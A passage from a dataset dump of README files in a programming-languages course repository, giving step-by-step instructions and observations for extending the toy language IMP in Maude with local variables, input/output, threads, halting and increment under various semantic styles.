"path": "/imp/5-imp-locals/1-imp-bigstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "---------------------------------------------------\r\n--- Big-step SOS: Adding local variables to IMP ---\r\n---------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the original big-step SOS\r\nof IMP in Maude to include local variables:\r\n\r\n1) Modify imp-bigstep.maude: Modify the previous Maude commands for programs\r\n to wrap them in configurations including a state that initializes all\r\n the purposely undeclared variables.\r\n\r\n2) Run imp-bigstep.maude: No program should be reduced, because of the missing\r\n semantics for let. The programs will be desugared though, so one should\r\n see let statements in each of the unreduced programs. Recall that one problem\r\n with big-step SOS is that it either reduces the entire program or reduces\r\n nothing, which makes it particularly hard to debug.\r\n\r\n3) Modify imp-semantics-bigstep.maude:\r\n a) Add a rule for the big-step SOS of let.\r\n b) Replace the previous rule for programs so that they are regarded\r\n as statements in the initial empty state.\r\n\r\n4) Run imp-bigstep.maude and check that all programs evaluate properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Simple and modular.\r\n"
},
{
"alpha_fraction": 0.7183063626289368,
"alphanum_fraction": 0.7205479741096497,
"avg_line_length": 54.54929733276367,
"blob_id": "492f2ebcf2caa66d0dea30d8f2128ec2218e4282",
"content_id": "e46660bdb1d50b5e5817ad4bebcd92c97b69ccf1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 4015,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 71,
"path": "/HW3/6-imp++/2-imp-input-output/4-imp-denotational/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "------------------------------------------------\r\n--- Denotational: Adding input/output to IMP ---\r\n------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal denotational\r\nsemantics of IMP in Maude to include input/output:\r\n\r\n1) Modify imp-denotational.maude: Include buffer.maude at the begining, modify\r\n all the existing commands to take the empty input buffer as additional\r\n argument (essentially that means replacing \"rewrite [[program]]\" by \"rewrite\r\n appCPO([[program]], epsilon)\" and \"rewrite appCPO([[statement]],state)\"\r\n by \"rewrite appCPO([[statement]],pairCPO(state,input))\"), and add Maude\r\n commands for executing the new programs at the end of the file.\r\n\r\n2) Run imp-denotational.maude: Nothing should work anymore, all programs\r\n should get stuck into some meaningless mathematical object which\r\n cannot be evaluated anymore. This is because the denotational semantics\r\n needs to be changed significantly so that the denotations of fragments\r\n of code take into account the input/output; right now they all expect\r\n states, but we passed them another kind of data, so they got stuck.\r\n\r\n3) Modify imp-semantics-denotational.maude:\r\n a) Include module BUFFER in module IMP-SEMANTICS-DENOTATIONAL and\r\n subsort Buffer to CPO, so now Buffer becomes a mathematical object.\r\n b) Make sure that the denotation of each expression is now a (partial)\r\n function from pairs (state,input) to pairs (value,input), where the\r\n source pair contains the input given to the expression before its\r\n evaluation and the target pair contains the input remaining after the\r\n evaluation of the expression. This is necessary because read() is\r\n an expression construct and it has a \"side effect\" on the input buffer.\r\n Similarly, make sure that the denotation of each statement is now a\r\n (partial) function from pairs (state,input) to pairs\r\n (state,input,output). An output is necessary for statements because\r\n of the print statement. Note the non-uniformity between input/output\r\n and expression/statements: expressions take an input buffer and\r\n generate another input buffer, while statements do the same only for\r\n the input, but not for the output. An alternative semantics could be\r\n given, where the denotation of statements would take an output buffer as\r\n\t well as argument and it would only modify it by adding to it if needed;\r\n we prefer to keep the mathematical domains minimal, however, which is\r\n the reason why we did not follow this alternative approach.\r\n\r\n4) Run imp-denotational.maude: Everything working before should work now,\r\n and should include empty input and output buffers in the result (triples);\r\n the new programs should still get stuck with missing denotations for\r\n read and print.\r\n\r\n5) Add the actual denotational semantics of read and print (one equation each).\r\n\r\n6) Run imp-denotational.maude and check that all programs evaluate properly.\r\n Note that the results are completely deterministic now and, moreover, that\r\n program nondetIOStmt evaluates to undefined. Unlike SOS, denotational\r\n semantics performs no search for derivations. If one wants to see\r\n non-deterministic behaviors then one needs to use power-domains, which we\r\n do not discuss here.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) The addition of the input/output buffers in the denotations of expressions\r\n and statements changed the types of these functions and where each piece\r\n of semantics information was located, so one has to make sure that\r\n projection and tupling functions are used to extract and combine the state\r\n and the input/output buffers. This is quite tedious.\r\n\r\n2) All equations corresponding to the denotations of all expressions and\r\n statements had to change.\r\n\r\n3) No non-determinism at all, only one execution path is chosen.\r\n"
},
{
"alpha_fraction": 0.6391339302062988,
"alphanum_fraction": 0.6439454555511475,
"avg_line_length": 39.56666564941406,
"blob_id": "c61ad74bfd13c33ecdd5e3f417c2c516dbf834b5",
"content_id": "d71864de381252f741dcb143bc752d0f3b24c422",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1247,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 30,
"path": "/HW3/imp/5-imp-locals/3-imp-smallstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "-----------------------------------------------------\r\n--- Small-step SOS: Adding local variables to IMP ---\r\n-----------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal small-step SOS\r\nof IMP in Maude to include local variables:\r\n\r\n1) Modify imp-smallstep.maude: Modify the previous Maude commands for programs\r\n to wrap them in configurations including a state that initializes all\r\n the purposely undeclared variables.\r\n\r\n2) Run imp-smallstep.maude: No program should be completely reduced, because\r\n of the missing semantics for let. The programs will be desugared and the\r\n rewriting of each program should get stuck on a let statement.\r\n\r\n3) Modify imp-semantics-smallstep.maude:\r\n a) Add three rules for the small-step SOS of let.\r\n b) Replace the previous rule for programs so that they are regarded\r\n as just statements in the initial empty state.\r\n\r\n4) Run imp-smallstep.maude and check that all programs evaluate properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Modular, though one would expect only two rules, not three, for let.\r\n\r\n2) The second small-step SOS rule for let is rather tricky.\r\n"
},
{
"alpha_fraction": 0.7341092228889465,
"alphanum_fraction": 0.7350044846534729,
"avg_line_length": 51.28571319580078,
"blob_id": "cab2b333b3ca4161ae9135bbe5061ce1a9d63e90",
"content_id": "29950e38fba0b45900dcc33dc0ab8c6b7ca3a9b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1117,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 21,
"path": "/HW4/imp_pp/4-imp-threads/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "-------------------------------------\r\n--- Adding dynamic threads to IMP ---\r\n-------------------------------------\r\n\r\nThis directory shows how to add dynamic threads to IMP,\r\nfollowing each of the semantical approaches discussed in Chapter 3.\r\nBy dynamic threads we mean threads which can be created, run\r\nconcurrently with the main program and the other threads, and terminated.\r\n\r\nEach subdirectory is dedicated to one corresponding semantic approach\r\nand shows what changes are necessary to the existing definition of IMP\r\nin order to define dynamic threads. Not all semantics can capture all\r\nthe non-deterministic behaviors due to threads.\r\n\r\nThe files builtins.maude and state.maude, which are shared by all semantics,\r\nstay unchanged. The files imp-syntax.maude and imp-programs.maude, also\r\nshared by all semantics, change as follows:\r\n- imp-syntax.maude: Adds syntax for spawning threads.\r\n- imp-programs.maude: Adds two new programs, namely sumSpawnPgm that spawns\r\n a new thread for each addition to the sum, and spawnPgm that is intended\r\n to generate many non-deterministic behaviors due to threads."
},
{
"alpha_fraction": 0.688359797000885,
"alphanum_fraction": 0.6931216716766357,
"avg_line_length": 41.953487396240234,
"blob_id": "9a117407ce424a60b596352c42b7b9ab6873298e",
"content_id": "2a66f86eb7d42ac636bfa0c6419d2159bb79d0b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1890,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 43,
"path": "/imp/2-imp-input-output/3-imp-smallstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "--------------------------------------------------\r\n--- Small-step SOS: Adding input/output to IMP ---\r\n--------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal small-step SOS\r\nof IMP in Maude to include input/output constructs:\r\n\r\n1) Modify imp-smallstep.maude: Include buffer.maude at the begining.\r\n\r\n2) Modify imp-semantics-smallstep.maude:\r\n a) Include module BUFFER in module IMP-CONFIGURATIONS-SMALLSTEP.\r\n b) Add input buffers to expression configurations.\r\n c) Add input and output buffers to statement configurations.\r\n d) Add an input buffer to initial configurations.\r\n e) Modify the existing smallstep SOS rules to use the new configurations,\r\n making sure that the rule for variable declarations includes the empty\r\n\t output in the initial statement configuration that it generates.\r\n\r\n3) Modify imp-smallstep.maude: modify the rewrite/search commands to use the\r\n new configurations, and add rewrite/search commands for the new programs\r\n as well.\r\n\r\n4) Run imp-smallstep.maude: Everything working before should still work, and\r\n should include empty input/output buffers in the result configurations;\r\n the new programs should get stuck when the first input/output construct\r\n is encountered.\r\n\r\n5) Add the actual small-step SOS of read and print, the first consisting of\r\n one rule and the second consisting of two rules.\r\n\r\n7) Run imp-smallstep.maude and check that all programs evaluate properly.\r\n Notice that all behaviors of the nondeterministic program are captured.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) All configuration had to change in order to hold the input and/or output.\r\n\r\n2) Consequently, all rules had to change, too.\r\n\r\n3) Unlike big-step SOS, small-step SOS captures all nondeterministic behaviors.\r\n"
},
{
"alpha_fraction": 0.6375749707221985,
"alphanum_fraction": 0.640906035900116,
"avg_line_length": 44.90625,
"blob_id": "e9bf4695240abaaa7dbeb5d0e9bfe8b0371e635c",
"content_id": "42d14f399b15ac0d02dce60b6916870b5b84a94c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1501,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 32,
"path": "/imp/3-imp-halting/2-imp-type-system-bigstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "--------------------------------------------------------------------------\r\n--- Type system (using big-step SOS): Adding abrupt termination to IMP ---\r\n--------------------------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal type system\r\n(based on big-step SOS) of IMP in Maude to include abrupt termination:\r\n\r\n1) Modify imp-type-system-bigstep.maude: Include Maude commands for typing\r\n the new programs.\r\n\r\n2) Run imp-type-system-bigstep.maude: Everything typing before should still\r\n type; sumDivByZeroPgm also types, because type systems typically do not\r\n prove that division-by-zero cannot take place (this is an undecidable\r\n problem). However, sumHaltPgm stays unchanged because there is no\r\n typing rule for halt yet (big-step SOS either reduces a program all the\r\n way through, or it does not reduce it at all).\r\n\r\n3) Modify imp-type-system-semantics-bigstep.maude: Add the actual typing\r\n rule for halt.\r\n\r\n4) Run imp-type-system-semantics.maude and check that all programs type\r\n properly. Note that in both cases of abrupt termination, the entire\r\n code base is type checked, not only the reachable code. This is also\r\n common for type checkers, because detecting unreachable code, like\r\n detecting division by zero, is also an undecidable problem.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Straightforward, as simple as it can get.\r\n"
},
{
"alpha_fraction": 0.7332789301872253,
"alphanum_fraction": 0.7340946197509766,
"avg_line_length": 49.08333206176758,
"blob_id": "fa1b069c8c2f12f0238e7e69beb5fbb9e173b0a0",
"content_id": "22c2b512fa3025492839b2e371636392f72f7f75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1226,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 24,
"path": "/HW4/imp/2-imp-input-output/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "----------------------------------\r\n--- Adding input/output to IMP ---\r\n----------------------------------\r\n\r\nThis directory shows how to add input (by means of a read() arithmetic\r\nexpression construct) and output (by means of a print(AExp) statement\r\nconstruct) to IMP, following each of the semantical approaches discussed\r\nin Chapter 3.\r\n\r\nEach subdirectory is dedicated to one corresponding semantic approach\r\nand shows what changes are necessary to the existing definition of IMP\r\nin order to add the new constructs. In all cases, read() only reads\r\ninteger values, which are consumed from the input buffer, and print\r\nonly prints integer values, which are collected in the output buffer.\r\nThese buffers need to be appropriately incorporated in each semantics.\r\n\r\nThe files builtins.maude and state.maude, which are shared by all semantics,\r\nstay unchanged. The files imp-syntax.maude and imp-programs.maude, also\r\nshared by all semantics, change as follows:\r\n- imp-syntax.maude: Adds syntax for read and print.\r\n- imp-programs.maude: Adds three new programs that make use of read and print.\r\n\r\nOne additional file is added, buffer.maude, which defines the new buffer\r\ndata-structure that is needed by all semantics.\r\n"
},
{
"alpha_fraction": 0.7665355801582336,
"alphanum_fraction": 0.7668930888175964,
"avg_line_length": 61.568180084228516,
"blob_id": "c2789f22f44c43ed298d8240fca79247c7e0e164",
"content_id": "8c9ecf92fc40b9aefee7479908de20dc75a75eaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 2797,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 44,
"path": "/HW3/imp/5-imp-locals/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "-------------------------------------\r\n--- Adding local variables to IMP ---\r\n-------------------------------------\r\n\r\nThis directory shows how to add blocks with local variable declarations\r\nto IMP, following each of the semantical approaches discussed in Chapter 3.\r\nThe scope of a variable declaration is now the remainder of the current block.\r\nThe previous global variable declarations are not necessary anymore, so\r\nwe also eliminate them. This is not necessary, because one can have both\r\nglobal and local variables in a language, but we do it anyway because we want\r\nto demonstrate a real-life language design scenario where the introduction of\r\na new language feature may make existing features useless or undesirable.\r\n\r\nEach subdirectory is dedicated to one corresponding semantic approach\r\nand shows what changes are necessary to the existing definition of IMP\r\nin order to define local variables.\r\n\r\nThe files builtins.maude and state.maude, which are shared by all semantics,\r\nstay unchanged. The files imp-syntax.maude and imp-programs.maude, also\r\nshared by all semantics, change as follows:\r\n- imp-syntax.maude: Adds syntax for local variable declarations. Since global\r\n variables are a special case of local ones (they are locals in the top-level\r\n block), we eliminate them from the syntax. This also makes the entire\r\n syntactic category of programs useless; however, for clarity, we keep it but\r\n we subsort statements to programs (thus, statements can also be regarded as\r\n programs and these are the only programs).\r\n- imp-syntax.maude: Adds a new module, IMP-DESUGARED-SYNTAX, which performs\r\n a series of syntactic transformations that simplify the syntax for all the\r\n subsequent semantics. More precisely, both the blocks and the local\r\n declarations are eliminated and instead a combined \"let\" statement is\r\n introduced, which both declares a local variable and delimits its scope.\r\n Note that the semantics of local variable declarations would be quite\r\n involved in most of the semantic approaches without these syntactic\r\n simplifications.\r\n- imp-programs.maude: Modifies the previous IMP programs to make use of blocks\r\n and local variables. One problem with local variables alone (without\r\n extensions with print) is that testing semantics becomes more difficult,\r\n because there is no state available to check after the top-level block is\r\n executed. To circumvent this problem, for semantic testing reasons\r\n exclusively, the new programs are allowed to use undeclared variables;\r\n however, one must then include those variables in the initial state in which\r\n the program is executed. This trick is not necessary when the print\r\n statement is introduced, because one could use print to observe the results\r\n of desired variables.\r\n"
},
{
"alpha_fraction": 0.6812896132469177,
"alphanum_fraction": 0.6886892318725586,
"avg_line_length": 49.18918991088867,
"blob_id": "878f438f80e9556e82d7eb46bc859e0bbc4b5460",
"content_id": "70fc411eaf7ac183fd05da14f0bca1f86f6ee276",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1892,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 37,
"path": "/imp/4-imp-threads/6-imp-evaluation-contexts/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "----------------------------------------------------------\r\n--- Evaluation contexts: Adding dynamic threads to IMP ---\r\n----------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal reduction semantics\r\nwith evaluation contexts of IMP in Maude to include dynamic threads:\r\n\r\n1) Modify imp-evaluation-contexts.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-evaluation-contexts.maude: Everything working before should still work;\r\n the new programs should get stuck on the first attempt to spawn a thread.\r\n\r\n3) Modify imp-split-plug-evaluation-contexts.maude: Add the corresponding splitting/cooling\r\n equations and rules stating that spawn(S) can reduce S and that spawn S1 S2 can reduce S2.\r\n\r\n4) Modify imp-semantics-evaluation-contexts-x.maude, for each x in {1,2,3}:\r\n a) Add the actual reduction semantics with evaluation contexts rule of dynamic\r\n threads that dissolves an empty thread (i.e., that reduces spawn {} to {});\r\n b) Add the structural equation enforcing right associativity of sequential composition;\r\n c) Add the syntactic extension of spawn to statements (from blocks).\r\n\r\n5) Run imp-evaluation-contexts.maude and check that all programs evaluate properly.\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) The splitting/pugging rules/equations and the rule for dissolving threads\r\n are normal and modular.\r\n\r\n2) However, we also had to add a structural equation for enforcing right\r\n associativity of sequential composition. This equation is an artifact\r\n of the new dynamic threads feature (to keep the definition of the latter\r\n simpler and modular) and does not involve the new syntax (spawn).\r\n\r\n3) Similarly to small-step SOS and MSOS, we also had to add the static\r\n extension of spawn to statements."
},
{
"alpha_fraction": 0.7214567065238953,
"alphanum_fraction": 0.7234252095222473,
"avg_line_length": 51.47368240356445,
"blob_id": "294f2fcdaf17082b40cbbbdcf03c008214b93746",
"content_id": "acb02b218d4953ebbd5885f356aa3c2ccee5ce06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1016,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 19,
"path": "/HW3/imp/3-imp-halting/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "----------------------------------------\r\n--- Adding abrupt termination to IMP ---\r\n----------------------------------------\r\n\r\nThis directory shows how to add abrupt termination to IMP,\r\nfollowing each of the semantical approaches discussed in Chapter 3.\r\n\r\nEach subdirectory is dedicated to one corresponding semantic approach\r\nand shows what changes are necessary to the existing definition of IMP\r\nin order to add abrupt termination. In all cases, there are two kinds\r\nof abrupt termination: explicit termination using a new statement, halt,\r\nand implicit termination when performing an illegal division by zero.\r\n\r\nThe files builtins.maude and state.maude, which are shared by all semantics,\r\nstay unchanged. The files imp-syntax.maude and imp-programs.maude, also\r\nshared by all semantics, change as follows:\r\n- imp-syntax.maude: Adds syntax for the halt statement.\r\n- imp-programs.maude: Adds two new programs, namely sumHaltPgm that makes\r\n use of halt and sumDivByZeroPgm that performs a division by 0.\r\n"
},
{
"alpha_fraction": 0.5983754396438599,
"alphanum_fraction": 0.6028881072998047,
"avg_line_length": 44.16666793823242,
"blob_id": "b270c5a43c351f025165ddd5fbe9fa469d7ab6ed",
"content_id": "162199ed04e170d9b2bdef367fa129e2cb33c25c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1108,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 24,
"path": "/HW3/imp/1-imp-increment/2-imp-type-system-bigstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "--------------------------------------------------------------------------\r\n--- Type system (using big-step SOS): Adding variable increment to IMP ---\r\n--------------------------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal type system\r\n(based on big-step SOS) of IMP in Maude to include variable increment:\r\n\r\n1) Modify imp-type-system-bigstep.maude: Include Maude commands for typing the new programs.\r\n\r\n2) Run imp-type-system-bigstep.maude: Everything typing before should still type;\r\n the new programs should stay unchanged (big-step SOS either reduces a program\r\n all the way through, or it does not reduce it at all).\r\n\r\n3) Modify imp-type-system-semantics-bigstep.maude: Add the actual typing rule of variable\r\n increment, stating that ++ X types to an integer provided that X has been declared.\r\n\r\n4) Run imp-type-system-bigstep.maude and check that all programs type properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Straightforward, as simple as it can get.\r\n"
},
{
"alpha_fraction": 0.5905587673187256,
"alphanum_fraction": 0.5953757166862488,
"avg_line_length": 39.52000045776367,
"blob_id": "d8fbd13ec581dacf380a7cbe43011a69616c68e0",
"content_id": "a40d06c16b1f134b4541e3c98ad6b37b651910bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1038,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 25,
"path": "/HW3/6-imp++/2-imp-input-output/2-imp-type-system-bigstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "--------------------------------------------------------------------\r\n--- Type system (using big-step SOS): Adding input/output to IMP ---\r\n--------------------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal type system\r\n(based on big-step SOS) of IMP in Maude to include input/output constructs:\r\n\r\n1) Modify imp-type-system-bigstep.maude: Include Maude commands\r\n for typing the new programs.\r\n\r\n2) Run imp-type-system-bigstep.maude: Everything typing before should still type;\r\n the new programs should stay unchanged (big-step SOS either reduces a program\r\n all the way through, or it does not reduce it at all).\r\n\r\n3) Modify imp-type-system-semantics-bigstep.maude: Add the actual typing rules\r\n of read and of print.\r\n\r\n4) Run imp-type-system-bigstep.maude and check that all programs type properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Straightforward, as simple and modular as it can get.\r\n"
},
{
"alpha_fraction": 0.6964903473854065,
"alphanum_fraction": 0.6999505758285522,
"avg_line_length": 46.16666793823242,
"blob_id": "fc71263f793ba05ad78fe7e422ab873ee691bba6",
"content_id": "c1735bc8fe18e85660c7080be2d021956942becd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 2023,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 42,
"path": "/HW4/imp_pp/3-imp-halting/5-imp-msos/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "----------------------------------------------\r\n--- MSOS: Adding variable increment to IMP ---\r\n----------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal MSOS of IMP in Maude\r\nto include abrupt termination:\r\n\r\n1) Modify imp-msos.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-msos.maude: Everything working before should still work;\r\n the new programs should get stuck on their first attempt to abruptly terminate.\r\n\r\n3) Modify imp-semantics-msos.maude:\r\n a) Add a new attribute, halting, to hold the halting status (true or false)\r\n b) Add the actual two MSOS rules for abrupt termination, each setting the\r\n status of halting to true.\r\n c) Add the new top statement construct to \"catch\" the halting signal,\r\n and redefine the MSOS rule for programs to make use of this top construct.\r\n\r\n4) Modify imp-msos.maude: Add the halting attribute, holding false, to any\r\n configuration holding an explicit state that appears in any of the concrete\r\n rewrite or search commands.\r\n\r\n5) Run imp-smallstep.maude and check that all programs evaluate properly,\r\n resulting in configurations that look the same way no matter whether the\r\n program was terminated normally or abruptly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) The addition of the top statement construct is artificial but unavoidable.\r\n SOS in general and MSOS in particular cannot distinguish between reductions\r\n taking place at the top of the original configuration and intermediate\r\n reductions taking place in rule premisses.\r\n\r\n2) Other than the extensions above that would have not been needed otherwise,\r\n adding abrupt termination did not require changes of existing semantic rules.\r\n The halting label allowed to elegantly carry over the halting signal\r\n \"all the way to the top\", without having to explicitly propagate it through\r\n each language construct as in small-step SOS.\r\n"
},
{
"alpha_fraction": 0.6435643434524536,
"alphanum_fraction": 0.6519421339035034,
"avg_line_length": 41.766666412353516,
"blob_id": "4068f07661470629bd1e1b9231e37a57cdf8584f",
"content_id": "dea5818a7f9d8604a4ed58cfbb5582277f176398",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1313,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 30,
"path": "/HW4/imp/1-imp-increment/3-imp-smallstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "--------------------------------------------------------\r\n--- Small-step SOS: Adding variable increment to IMP ---\r\n--------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal small-step SOS\r\nof IMP in Maude to include variable increment:\r\n\r\n1) Modify imp-smallstep.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-smallstep.maude: Everything working before should still work;\r\n the new programs should get stuck on the first statement involving increment.\r\n\r\n3) Modify imp-semantics-smallstep.maude: Change the existing semantic rules to\r\n always propagate the side effects; almost all rules need to change.\r\n\t \r\n5) Run imp-smallstep.maude: Everything working before should still work, and the\r\n new programs should still get stuck on their firsts increment.\r\n\r\n6) Add the actual small-step SOS of increment, which consists of one rule.\r\n\r\n7) Run imp-smallstep.maude and check that all programs evaluate properly;\r\n notice the five ways (x is 0, 1, 2, 3, or stuck) that nondetPgm evaluates.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Every rule involving the evaluation of any non-atomic expression had to change\r\n in order to propagate the side effects.\r\n"
},
{
"alpha_fraction": 0.71875,
"alphanum_fraction": 0.7197916507720947,
"avg_line_length": 48.52631759643555,
"blob_id": "4559f19053382226985c7248185df546a8b581d1",
"content_id": "643db71456e267e4aa417f0c58257e6bbe3584bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 960,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 19,
"path": "/HW3/imp/1-imp-increment/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "----------------------------------------\r\n--- Adding variable increment to IMP ---\r\n----------------------------------------\r\n\r\nThis directory shows how to add variable increment to IMP,\r\nfollowing each of the semantical approaches discussed in Chapter 3.\r\n\r\nEach subdirectory is dedicated to one corresponding semantic approach\r\nand shows what changes are necessary to the existing definition of IMP\r\nin order to add the variable increment. In all cases, the variable\r\nincrement adds side effects to expression evaluation, which therefore\r\nneeds to be appropriately incorporated in each semantics.\r\n\r\nThe files builtins.maude and state.maude, which are shared by all semantics,\r\nstay unchanged. The files imp-syntax.maude and imp-programs.maude, also\r\nshared by all semantics, change as follows:\r\n- imp-syntax.maude: Adds syntax for variable increment.\r\n- imp-programs.maude: Adds two new programs, sum++Pgm and nondetPgm,\r\n which use variable increment.\r\n"
},
{
"alpha_fraction": 0.6849237680435181,
"alphanum_fraction": 0.6894409656524658,
"avg_line_length": 40.16666793823242,
"blob_id": "a3df491c8a5baaa2a65b3fe9184956af3dfd9450",
"content_id": "904d2db0268f1ee8d7b4062c0ba0eca7f0389c3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1771,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 42,
"path": "/HW4/imp/2-imp-input-output/5-imp-msos/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "----------------------------------------\r\n--- MSOS: Adding input/output to IMP ---\r\n----------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal MSOS of IMP in\r\nMaude to include input/output:\r\n\r\n1) Modify imp-msos.maude: Include buffer.maude at the beginning.\r\n\r\n2) Modify imp-semantics-msos.maude:\r\n a) Include module BUFFER in module IMP-CONFIGURATIONS-SMALLSTEP.\r\n b) Add input buffers to expression configurations.\r\n c) Add input and output buffers to the set of configuration attibutes.\r\n d) Add an input buffer to initial configurations.\r\n e) Modify the rule for programs to initialize the state to one also\r\n including the input/output.\r\n\r\n3) Modify imp-msos.maude: modify the rewrite/search commands to use the\r\n new configurations, and add rewrite/search commands for the new programs\r\n as well.\r\n\r\n4) Run imp-msos.maude: Everything working before should still work, and\r\n should include empty input/output buffers in the result configurations;\r\n the new programs should get stuck when the first input/output construct\r\n is encountered.\r\n\r\n5) Add the actual MSOS of read and print, the first consisting of\r\n one rule and the second consisting of two rules.\r\n\r\n7) Run imp-msos.maude and check that all programs evaluate properly.\r\n Notice that all behaviors of the nondeterministic program are captured.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) We only had to include the input/output-specific infrastructure and rules,\r\n without changing any of the existing rules for statements or expressions.\r\n\r\n2) We still had to change the rule for programs, to take the input into account\r\n and to initiate the empty output buffer.\r\n"
},
{
"alpha_fraction": 0.6265520453453064,
"alphanum_fraction": 0.634192943572998,
"avg_line_length": 45.59090805053711,
"blob_id": "615ece20daed3aec680afd2ee5613361117a35f2",
"content_id": "d535130e7a3e57d207afb081bee39b9ef82c8559",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1047,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 22,
"path": "/HW4/imp_pp/3-imp-halting/6-imp-evaluation-contexts/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "-------------------------------------------------------------\r\n--- Evaluation contexts: Adding abrupt termination to IMP ---\r\n-------------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal reduction semantics\r\nwith evaluation contexts of IMP in Maude to include abrupt termination:\r\n\r\n1) Modify imp-evaluation-contexts.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-evaluation-contexts.maude: Everything working before should still work;\r\n the new programs should get stuck when reaching an abrupt termination situation.\r\n\r\n3) Modify imp-semantics-evaluation-contexts-x.maude, for each x in {1,2,3}:\r\n Add the actual reduction semantics with evaluation contexts of abrupt termination.\r\n\r\n4) Run imp-evaluation-contexts.maude and check that all programs evaluate properly.\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) We only had to add the two rules for abrupt termination. Nothing else changed.\r\n"
},
{
"alpha_fraction": 0.6304508447647095,
